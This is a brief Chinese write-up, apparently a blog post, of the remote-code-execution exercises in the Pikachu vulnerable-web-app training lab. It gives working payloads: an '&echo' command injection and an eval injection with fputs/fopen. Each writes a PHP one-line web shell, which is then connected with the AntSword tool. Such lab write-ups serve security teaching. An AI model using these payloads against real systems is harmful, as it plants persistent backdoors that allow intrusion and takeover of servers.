Pikachu靶场之RCE漏洞详解

2407-2 shw2024-09-08 16:15

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
诸神缄默不语2 分钟前
当无法直接用apt instll时,Linux如何离线安装软件包(以make为例)
linux·运维·服务器
learning-striving10 分钟前
kali默认桌面Xfce切换为GNOME桌面
linux·运维·服务器·kali
黄昏晓x13 分钟前
Linux----进程控制
android·linux·运维
郝亚军19 分钟前
ubutnu 64位系统,需要安装的工具包
linux·运维·ubuntu
宇钶宇夕21 分钟前
CoDeSys入门实战一起学习(二十八):(ST)三台电机顺起逆停程序详解
运维·学习·自动化·软件工程
萧曵 丶39 分钟前
Nginx 高频面试题(含答案)
运维·nginx
Bear on Toilet1 小时前
腾讯云服务器开放UDP端口操作手册_2026最新
服务器·udp·腾讯云
吕司1 小时前
Linux系统安装MySQL
linux·运维·服务器
源力祁老师1 小时前
深入解析 Odoo 中 default_get 方法的功能
java·服务器·前端
犀思云1 小时前
构建全球化多云网格:FusionWAN NaaS 在高可用基础设施中的工程实践
运维·网络·人工智能·系统架构·机器人
热门推荐
01GitHub 镜像站点02Vue-skills的中文文档03一文了解国产算子编程语言 TileLang,TileLang 对国产开源生态的影响与启示04Claude Code Skills 实用使用手册05让 Trae IDE 智能体 “读懂”文档 Excel+PDF+DOCX :mcp-documents-reader 工具使用指南06UV安装并设置国内源07在Trae中使用Pencil MCP08Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services09OpenClaw部署与配置教程:在Mac mini上接入国产大模型与飞书10OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)